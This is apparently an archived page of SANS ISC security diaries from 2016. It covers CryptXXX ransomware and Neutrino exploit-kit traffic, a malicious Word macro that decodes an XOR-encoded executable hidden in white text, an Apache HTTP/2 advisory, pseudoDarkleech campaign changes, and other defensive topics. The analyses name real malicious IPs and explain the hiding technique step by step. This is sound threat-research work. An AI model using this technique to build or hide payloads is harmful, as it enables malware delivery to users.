  • If you have a vendor monitoring your cameras, do the VPN thing with them also.  If you MUST give them direct access, only allow their IP or subnet.  (But also start looking for a different security monitoring vendor if you have to do this)
  • Most important of all, try to head this stuff off at the pass.  Scan new gear during the evaluation phase.  If it doesn't pass your assessment for some reason, phrase your report in business terms, outlining the real risks to the business.  You can't get buy-in from the folks who make these decisions by saying "No, but it's too complicated for me to explain it to you, just No.". 

As always, preventing these problems before they occur is the easiest way to deal with them.  You won't catch them all, but hopefully you'll catch things like this!

If you find one of these cameras on your network, please let us know in our comment section!  Or better yet, if you have a network-connected security camera that has a different web server, please share the server and version in our comments!

===============
Rob VandenBrink
Compugen

0 Comments

Published: 2016-07-06

CryptXXX ransomware updated

Introduction

When generating exploit kit (EK) traffic earlier today, I noticed a change in post-infection activity on a Windows host infected with CryptXXX ransomware.  This happened after an infection caused by Neutrino EK triggered from the pseudoDarkleech campaign.


Shown above:  Flow chart for Neutrino EK/CryptXXX caused by pseudoDarkleech.

This morning, the decryption instructions for CryptXXX ransomware looked different.  A closer examination indicates CryptXXX has been updated.  As I write this, I haven't found anything online yet describing these recent changes, so this diary takes a quick look at the traffic.


Shown above:  An infected Windows desktop from earlier today.

Details

Today's EK traffic was on 198.71.54.211 using the same domain shadowing technique we've seen before from various campaigns using Neutrino EK (formerly using Angler EK [1, 2, 3] before Angler disappeared).  Post-infection traffic was over 91.220.131.147 on TCP port 443 using custom encoding, a method CryptXXX has used since it first appeared earlier this year [4].


Shown above:  Traffic from today's Neutrino EK/CryptXXX infection filtered in Wireshark.

Below are some screenshots of the Neutrino EK traffic.


Shown above:  Neutrino EK landing page.


Shown above:  Neutrino EK sends a Flash exploit.


Shown above:  Neutrino EK sends the payload (it's encrypted).

In a change of behavior, text and HTML files for the CryptXXX decryption instructions are downloaded in the clear during the post-infection traffic.


Shown above:  Text-based decryption instructions sent on 91.220.131.147 over TCP port 443.


Shown above:  HTML-based decryption instructions sent on 91.220.131.147 over TCP port 443.

I used my Security Onion setup to see what Snort-based alerts triggered.  Looks like the EmergingThreats team already has a signature covering the new CryptXXX post-infection traffic.


Shown above:  My results from Sguil on Security Onion using the ET Pro ruleset.

Below are two screenshots with HTML decryption instructions from the infected Windows host's desktop.

Final words

Although I haven't noticed anything yet, I'm sure some of the usual sources will have a more in-depth article on these recent changes in CryptXXX ransomware.  This diary is just meant to give everyone a heads-up.

Pcap and malware for this diary are located here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

References:

[1] http://blogs.cisco.com/security/talos/angler-domain-shadowing
[2] https://blog.malwarebytes.com/threat-analysis/2015/04/domain-shadowing-with-a-twist/
[3] https://www.proofpoint.com/us/threat-insight/post/The-Shadow-Knows
[4] https://www.proofpoint.com/us/threat-insight/post/cryptxxx-new-ransomware-actors-behind-reveton-dropping-angler

0 Comments

Published: 2016-07-06

Hiding in White Text: Word Documents with Embedded Payloads

This is a guest diary by Yaser Mansour. Due to the extensive use of images, please note that all the images are clickable to view them at full size. A PDF version of this diary is available here

Malicious macros in Office documents are not new, and several samples have been analyzed here at the ISC Diary website. Usually, the macro script is used to drop the second stage malware either by reaching to the internet or by extracting a binary embedded in the Office document itself. In this post, we will examine two similar malicious documents that were observed separately with each dropping a different malware sample, namely, NetWiredRC and iSpy.

There are several interesting facts about the samples we are going to analyze today:

  1. The macro embedded in the Office document does not reach to the internet. Instead, it extracts a binary embedded in the Word document itself in ASCII hex format and writes it to disk.
  2. Both malicious Word documents were observed separately. However, both use the same technique to extract the embedded binary as well as the same decoy message enticing the end user to enabled macros.
  3. During network forensics of the NetWiredRC malware, a new C&C command was observed which was not reported by [1][2]. This also resulted in a total of 9 custom Snort signatures being submitted and published in Snort Community Ruleset [3][4].
  4. The iSpy sample generated new network traffic patterns than what were observed previously. More about this in the following sections.

Brief History of NetWiredRC and iSpy Malware Samples

NetWiredRC RAT family has been extensively discussed by security researchers [1][2], and recently TALOS released Snort signatures to detect NetWiredRC over the network [3], and a new signature for the new NetWiredRC command[4].

iSpy was first observed by the author during January 2016 with the sample b33c5ba388f8a32006133cb8888a9370. This sample performed its C&C over HTTP as seen in the below screenshot and Snort signatures were released [4].

Picture 1

Other samples were observed during March and April 2016 (65ee535f0efcb30626ce5c8e7763e782 and cd3a43d3504925a396183b467b0980cb, respectively). Both of these samples also used HTTP for their C&C communication. One of the latest samples observed was extracted from the embedded payload in the Word document discussed in the remaining of this article. This recent sample performs its C&C over SMTP for initial and exfiltration communication as shown in the screenshots below.

Malicious Word Documents Analysis

Both malicious documents implement the same algorithm used to extract the embedded binary. While the focus will be on the malicious document embedding the NetWiredRC sample, we will attempt to provide side-by-side analysis of both malicious documents. Throughout the remaining of this post, comparative screenshots will have the first screenshot reflecting the analysis of the document dropping NetWiredRC while the second reflecting the iSpy sample.

Both samples documents have exactly the same decoy message enticing the unsuspicious user of disabling the protected view and enabling macros as seen in the below screenshot.

Interestingly each document consisted of a large number of “empty” pages with the only text visible as shown in the above screenshot. More accurately, the document consisted of 232. The second malicious Word document consisted of 528 pages.

The document was initially inspected for the presence of macros using oledump.py [5]. From the screenshots below, we can see that document indeed embeds a macro. The VBScript code was extracted using the oledump.py or olevba.py [6] can also be used. Both tools exist in the Remnux [7] image.

 

Closely inspecting the dumped and obfuscated VBScript, there were no indications that the script reaches to the internet. Going further through the code, there was an interesting function as shown in the below screenshot. Please note the highlighted variable and its data type as it plays a major role on how the embedded second stage binary is extracted from the Office document.

Continuing to inspect the script, it becomes apparent how the second stage binary is dropped to the local disk. The script leverages the Word Object Model [8] to access the Paragraph Object Members [9]. More about this later. On order to understand why the script would access paragraphs from the document itself, the document was opened while macros are disabled prevent the script from executing.

Scrolling through the document to inspect what these 232 pages contain showed only empty pages containing nothing, or did they? To verify, the document was zip extracted since it is an OOXML document. Extracting the document will also help in getting access to the internal structures of the document.  Once extracted, we end up with a set of XML files. We are interested in one file, in particular, the document.xml. This file contains the actual content of the document in XML representation.

An OOXML file contains element blocks representing the various content aspects of a document. For examples, how paragraphs in a word document are structured as XML [10]. In a nutshell, a paragraph is expressed with the XML element block . Text within a paragraph block is expressed by the XML element . Within the paragraph block, other XML elements may exist to represent things like formatting (). For more information about these elements, refer to the EMCA-376 Standard of the Office Open XML File Formats [11] and [12].

Back to our document.xml file, when viewed in a browser we notice that we have 24 paragraphs denoted by the element as we explained earlier. Inspecting and mapping the elements to the actual paragraphs in the document leads up to the fact that the last paragraph spans across the 232 pages. This paragraph not only contains text but also formats the text within the paragraph to be in white color (#FFFFFF) as a hiding technique from the viewer of the document.

So we have a VBScript that defines a variable as a paragraph and hidden paragraph that spans 232 pages. This indicates that the VBScript does in fact access the Word Object Model in order to reach to the paragraph. Inspecting the VBScript, we find evidence that the script indeed attempts to access the paragraphs objects and the text within which are included in the document. Specifically, the script has interest in paragraph number 24.

A bird’s-eye view of this segment of script suggests that the script loops through the paragraphs available within the document and the embedded text within until it reaches to paragraph 24. From its text, the script grabs 2 letters (or 1 sting hex byte, see below 2 screen shots), “un-hexifies” it o get the decimal/numerical representation using the Type Character “&H” (hS variable value) Hexadecimal Literal [13], and then hex xor it with hexadecimal key &HEE (0xEE) to produce hexadecimal bytes that serve a specific purpose. 

Let’s take the first two bytes from the below screenshot to test this logic. The first 2 string hex bytes are “A3 B4”. The below table breaks down the conversions performed by the script snippet above. Do you see anything familiar in the table? The two bytes “4D 5A” or “MZ” are the magic number of the DOS MZ executable.

Raw String Hex Byte Decimal Representation (&H) Decimal Representation (Xor 0xEE) Hex Representation
A3 163 77 0x4D
B4 180 90 0x5A

To automate this the above algorithm, the following python script was created. 

Once each byte is extracted and converted, it is written to disk byte-by-byte until there is no more text left in the paragraph. Afterward, the script calls a function passing the name of the just generated binary to execute it. The function uses the built-in function Shell() [14] to execute the second stage binary. The function is captured in the below screenshot.

To put everything together, the below screenshot represents the beautified and commented version of both functions discussed earlier.

The below screenshot represents the same “ParagraphRemove()” (beautified and commented ) from the second malicious Word, which dropped iSpy malware sample. An interesting note from both malicious Word documents is the “Startincex” misspell. 

References:

[1] https://www.circl.lu/pub/tr-23/
[2] http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/
[3] http://blog.snort.org/2016/03/snort-subscriber-rule-set-update-for_29.html
[4] http://blog.snort.org/2016/05/snort-subscriber-rule-set-update-for_31.html
[5] https://blog.didierstevens.com/programs/oledump-py/
[6] http://www.decalage.info/vba_tools
[7] https://remnux.org/
[8] https://msdn.microsoft.com/en-us/library/kw65a0we.aspx
[9] https://msdn.microsoft.com/en-us/library/office/ff839491.aspx
[10] http://officeopenxml.com/WPparagraph.php
[11] http://www.ecma-international.org/publications/standards/Ecma-376.htm
[12] https://msdn.microsoft.com/en-us/library/office/gg607163(v=office.14).aspx
[13] https://msdn.microsoft.com/en-us/library/s9cz43ek.aspx
[14] https://msdn.microsoft.com/en-us/library/xe736fyk(v=vs.90).aspx

 

1 Comments

Published: 2016-07-05

Apache Update: TLS Certificate Authentication Bypass with HTTP/2 (CVE-2016-4979)

Apache released an important update today to fix a vulnerability that affects servers that have http/2 enabled and use TLS client certificates for authentication.

Apache 2.4.18-20 are vulnerable if:

- TLS certificates are used for authenticating clients (look for the "SSLVerifyClient require" directive in your configuration file)

- http/2 is enabled. (see if the "Protocols" line includes h2 and/or h2c). 

Only access over http/2 is affected. Access via http/1.1 is still properly controlled even if http/2 is enabled. Over TLS, clients that suport http/2 will likely use it over http/1.1.

http/2 is not enabled by default in any currently shipping version of Apache.

To quickly check your network traffic for http/2 use, you can use this tshark line:

tshark -Y 'ssl.handshake.extensions_alpn_str == "h2"' -n -i en0  \
-T fields -e ip.src -e ip.dst -e ssl.handshake.type -e ssl.handshake.extensions_server_name \
-e ssl.handshake.extensions_alpn_str
 

It will list the client requests as well as the server responses that contain http/2 including the host name that the client is trying to reach. For example:

10.5.1.12    216.58.192.66    1    cm.g.doubleclick.net    h2,spdy/3.1,http/1.1
216.58.192.66    10.5.1.12    2        h2

In this handshake, the client offers http/2, spdy/3.1 as well as http/1.1 to cm.g.doubleclick.net . The server then selects http/2 (h2).

 

 

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

2 Comments

Published: 2016-07-03

Is Data Privacy part of your Company's Culture?

I was reading a while back about the FDIC data lost who had 5 major breaches between Oct 30, 2015 (taxpayers’ personally identifiable information) and could have been prevented with a combination of host based and network controls to prevent sensitive data from leaving the network. According to the information released, the breaches occurred because individual copied data to USB drives which then left the premises. A strong and effective security policy restricting access to USB drive could have helped prevent this. All removable drives should be encrypted and limit who can write to a removable drive for accountability.

Here are three tips I think can help:

1- Have HR involved and provide awareness training [1] on a regular basis

Have the human resource (HR) department do awareness training on a regular basis with an emphasis on the organization access data policy and explain the consequences to the company and the individual when data is lost. If the data policy changes, HR must explain clearly what those changes are and why they were implemented.

2- Track, tag and audit sensitive data

It is possible to protect corporate data by tagging and classifying it properly. Employees should have access to the data they need to do their job (need to know) and nothing else. Auditing and reporting who access what help understanding if the proper controls and safeguard are working. These controls should also be applied to who print what documents. For example, if you do business in the EU, in May 2018, the EU [2] is implementing a new directive on data protection. This update means stiffer penalty of "[...] up to 4% of their global annual turnover."[3]

3- Encrypt all external devices and identify who can transfer sensitive data?

First, having all external devices used to copy sensitive data encrypted is a good idea, if it get lost, it cannot be access without the proper encryption key. Next, have a policy that identify who can copy and save data sensitive data on an external media. As per Item #2, track, audit and report when that data was access or transferred and by whom.

Is Data Privacy part of your Company's Culture? Do you feel the policy use to protect data within your organization is adequate?

[1] https://securingthehuman.sans.org/
[2] http://ec.europa.eu/justice/data-protection/reform/index_en.htm
[3] http://europa.eu/rapid/press-release_MEMO-15-6385_en.htm
[4] https://technet.microsoft.com/en-us/magazine/2007.06.grouppolicy.aspx

-----------
Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

3 Comments

Published: 2016-07-02

Change in patterns for the pseudoDarkleech campaign

Introduction

I'm used to seeing large blocks of code containing 12,000 to 15,000 characters associated with the pseudo-Darkleech campaign.  Below is an example from earlier this week.


Shown above:  Start of pseudo-Darkleech injected code from a compromised website.

It's a very distinctive pattern, and it's easy to find if you know what you're looking for.  But later in the week, things changed.  Now I'm seeing a much different type of script in websites compromised by the pseudo-Darkleech campaign.


Shown above:  Start of pseudo-Darkleech injected code from the same website three days later.

Here are Pastebin links for the code before and after the change:

This is an interesting development that deserves more attention.

Background

I've investigated the Darkleech campaign since Sucuri started calling it "pseudo-Darkleech" back in March 2015, and I've tracked how script associated with this campaign has evolved over time [1].  Earlier this year, pseudo-Darkleech started distributing CryptXXX ransomware [2].  By June 2016, the campaign switched to using Neutrino exploit kit (EK) [3] after Angler EK disappeared from our radar [4].

Below is a current flow chart for CryptXXX ransomware infections caused by the pseudo-Darkleech campaign.


Shown above:  Chain of events for a successful infection.

Keep in mind that a campaign consists of an EK plus an infrastructure that directs potential victims to the EK [5].


Shown above:  A slide from my presentation about exploit kits.

Since February 2016, injected code from the pseudo-Darkleech campaign has been a large block of highly-obfuscated script.  It's often more than 12,000 characters long.  Back in April 2016, Daniel Wesemann (another ISC handler) posted a two-part diary on how to decode this obfuscated pseudo-Darkleech script [6, 7].  But now the pseudo-Darkleech campaign is using a fairly straight-forward iframe without any obfuscation.

Details

I first noticed the change on Thursday, 2016-06-30 while reviewing compromised websites [8].  Traffic from compromised site gennaroespositomilano[.]it had the typical large block of pseudo-Darkleech injected code on Tuesday [9].  But the same compromised website had much different injected code three days later [10].

Decryption instructions for CryptXXX ransomware sent by the pseudo-Darkleech campaign have remained consistent, despite the recent change of pattern for the campaign's injected script.

CryptXXX decryption instructions use different domains for different campaigns.  For example, domains used by CryptXXX samples from the EITest campaign are consistently different than domains used by CryptXXX samples from the pseudo-Darkleech campaign.

Since 2016-06-21, the pseudo-Darkleech CryptXXX samples I've collected have used 2mpsasnbq5lwi37r as the prefix for tor domains in the decryption instructions.  However, I expect these domains will change sometime within the next week or so.


Shown above:  Domains from current pseudo-Darkleech CryptXXX decryption instructions.

Final words

EK-based campaigns usually evolve through small changes.  In this case, the pseudo-Darkleech campaign only changed its injected script.  However, many security professionals may still be looking for that very distinct, massive block of code previously associated with this campaign.

Hopefully, this diary helps people become aware of the change.

---

Brad Duncan
brad [at] malware-traffic-analysis.net

References:

[1] http://researchcenter.paloaltonetworks.com/2016/03/unit42-campaign-evolution-darkleech-to-pseudo-darkleech-and-beyond/
[2] https://isc.sans.edu/forums/diary/Angler+Exploit+Kit+Bedep+and+CryptXXX/20981/
[3] https://isc.sans.edu/forums/diary/Neutrino+EK+and+CryptXXX/21141/
[4] https://www.proofpoint.com/us/threat-insight/post/Neutrino-Exploit-Kit-Distributing-Most-CryptXXX
[5] http://researchcenter.paloaltonetworks.com/2016/06/unit42-understanding-angler-exploit-kit-part-1-exploit-kit-fundamentals/
[6] https://isc.sans.edu/forums/diary/Decoding+PseudoDarkleech+1/20969/
[7] https://isc.sans.edu/forums/diary/Decoding+PseudoDarkleech+Part+2/20975/
[8] http://www.malware-traffic-analysis.net/2016/06/30/index.html
[9] http://www.malware-traffic-analysis.net/2016/06/28/index.html
[10] http://www.malware-traffic-analysis.net/2016/07/01/index.html

1 Comments

Published: 2016-07-01

APT and why I don't like the term

Introduction

In May 2015, I wrote a dairy describing a "SOC analyst pyramid."  It describes the various types of activity SOC analysts encounter in their daily work [1].  In the comments, someone stated I should've included the term "advanced persistent threat" (APT) in the pyramid.  But APT is supposed to describe an adversary, not the activity.

As far as I'm concerned, the media and security vendors have turned APT into a marketing buzzword.  I do not like the term "APT" at all.

With that in mind, this diary looks at the origin of the term APT.  It also presents a case for and and a case against using the term.

Origin of "APT"

In 2006, members of the United States Air Force (USAF) came up with APT as an unclassified term to refer to certain threat actors in public [2].

Background on the term can be found in the July/August 2010 issue of Information Security magazine.  It has a feature article titled, "What APT is (And What it Isn't)" written by Richard Bejtlich.  The article is available here.


Shown above: An image showing the table of contents entry for Bejtlich's article.

According to Bejtlich, "If the USAF wanted to talk about a certain intrusion set with uncleared personnel, they could not use the classified threat actor name.  Therefore, the USAF developed the term APT as an unclassified moniker" (page 21).  Based on later reports about cyber espionage, I believe APT was originally used for state-sponsored threat actors like those in China [3].

A case for using "APT"

Bejtlich's article has specific guidelines on what constitutes an APT.  He also discussed it on his blog [4].  Some key points follow:

  • Advanced means the adversary can operate in the full spectrum of computer intrusion.
  • Persistent means the adversary is formally tasked to accomplish a mission.
  • Threat refers to a group that is organized, funded, and motivated.

If you follow these guidelines, using APT to describe a particular adversary is well-justified.

Mandiant's report about a Chinese state-sponsored group called APT1 is a good example [3].  In my opinion, FireEye and Mandiant have done a decent job of using APT in their reporting.

A case against "APT"

The terms "advanced" and "persistent" and even "threat" are subjective.  This is especially true for leadership waiting on the results of an investigation.

Usually, when I've talked with people about APT, they're often referring to a targeted attack.  Some people I know have also used APT to describe an actor behind a successful attack, but it wasn't something I considered targeted.  We always think our organization is special, so if we're compromised, it must be an APT!  But if your IT infrastructure has any sort of vulnerability (since people are trained to balance risk and profit), you're as likely be compromised by a common cyber criminal as you are by an APT.

Bejtlich states that after Google's "Operation Aurora" breach in 2010, wide-spread attention was brought to APT.  At that point, many vendors saw APT as a marketing angle to rejuvenate a slump in security spending [2].  I think most media outlets have tried to ride that trend.


Shown above:  An example of media reporting on APT.

A good example of bad reporting is the "Santa-APT" blog post from CloudSek in December 2015.  The CloudSek site (and the blog post) are no longer online; however, other sources have reported the info [5] and a cached version is available here.


Shown above:  Screenshots of the alleged "Santa APT" app.

The blog post reported a malicious Santa-themed Android app hosted on the Google Play Store.  CloudSek stated the app was the work of an APT group that it called Santa-APT.  The post was very short on details, and many I knew in the community were skeptical of CloudSek's claim.  The company's tweet even had a comment disputing the article's claims [6].  I certainly didn't see anything that indicated the malware was created by an advanced adversary with specific goals against distinct targets.

Final words

As far as I'm concerned, APT is still a vague term that's now a buzzword.  People generally use it according to their own biases.  Remember that APT is supposed to describe an adversary and not the attack.

I recently attended the FOR578 Cyber Threat Intelligence class at SANSFIRE 2016.  For me, one of the big points from FOR578 is that attribution is tricky.  You can review all the data about an attack on your network and still not be certain who is behind it.  People's biases get in the way, especially when the biggest question is "who did this?"

But identifying the people behind an attack is often futile.  Find patterns in the available data and try to categorize it, yes.  You might recognized a repeat attacker, and you'll be better prepared to respond.  However, you may never truly know who is behind any given set of attacks.  I feel we should be focusing on what vulnerabilities allowed the attack to happen in the first place.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

References:

[1] https://isc.sans.edu/forums/diary/SOC+Analyst+Pyramid/19677/
[2] http://viewer.media.bitpipe.com/1152629439_931/1279750495_63/0710_ISM_updated_072010.pdf
[3] http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf
[4] http://taosecurity.blogspot.com/2010/01/what-is-apt-and-what-does-it-want.html
[5] http://www.theregister.co.uk/2015/12/16/ho_ho_hosed_asian_biz_malware_pwns_airgaps_thousands_of_androids/
[6] https://twitter.com/fb1h2s/status/677083166461452288

2 Comments